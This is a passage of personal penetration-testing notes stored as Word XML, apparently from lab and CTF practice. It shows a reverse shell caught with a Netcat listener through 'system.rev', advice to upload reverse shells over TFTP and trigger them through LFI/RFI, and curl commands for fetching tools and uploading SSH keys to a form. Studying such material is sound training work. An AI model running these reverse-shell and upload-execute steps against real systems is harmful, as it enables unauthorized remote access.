    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we've loaded our module, we can execute commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system.exec "id"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$51</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll start a Netcat handler to catch our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 6379 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ExecuteCommand module already includes a reverse shell command, so we'll use that to launch our shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system.rev kali 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we'll catch our reverse shell as pablo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 6379 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.120.217: inverse host lookup failed: Unknown host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connect to [kali] from (UNKNOWN) [192.168.120.217] 48414</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029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EC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s0qbzusr4" w:id="361"/>
      <w:bookmarkEnd w:id="361"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TFTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If TFTP is connected to a web server, and you have LFI/RFI vulnerability on website, you can go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var/lib/tftpboot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find all the files that you can upload to TFTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To connect to TFTP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="548"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TFTP [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To Upload files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="802"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">put [file name]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's a good idea to upload reverse shells and then run it using the LFI/RFI and the file path </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var/lib/tftpboot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F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9FA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n7d1exrqh00w" w:id="362"/>
      <w:bookmarkEnd w:id="362"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download files using CURL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="803"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For GitHub releases page, you had to add the "-L" flag to follow re-directs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="803"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -L https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 -o pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="803"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then for GitHub and ExploitDB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">raw,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> you just do</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl &lt;url&gt; -o newFileName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A01">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl websites:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl [URL]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[MACHINE_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A03">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A04">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to do upload text files to forms using curl:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is seen in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play Amaterasu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -F file=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@id_alfredo.pub</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://192.168.56.101:33414/file-upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "@" basically means don't directly use the string "id_alfredo.pub" as the argument, but rather, actually read the content of "id_alfredo.pub" (a local file) and then use that as the argument </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
